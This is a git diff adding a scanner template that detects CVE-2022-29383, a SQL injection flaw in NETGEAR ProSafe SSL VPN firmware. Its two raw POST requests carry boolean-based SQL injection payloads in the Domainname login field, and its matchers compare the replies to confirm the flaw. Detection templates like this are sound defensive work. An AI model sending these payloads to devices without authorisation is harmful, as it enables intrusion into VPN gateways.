commit
ffc2fc3fc4
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-29383
|
||||
|
||||
info:
|
||||
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
|
||||
author: elitebaz
|
||||
severity: critical
|
||||
description: |
|
||||
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
|
||||
reference:
|
||||
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
|
||||
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-29383
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,sqli,netgear,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scgi-bin/platform.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||
|
||||
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
|
||||
|
||||
- |
|
||||
POST /scgi-bin/platform.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||
|
||||
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(body_1, "User authentication Failed")
|
||||
- contains(body_2, "User Login Failed for SSLVPN User.")
|
||||
condition: and
|
Loading…
Reference in New Issue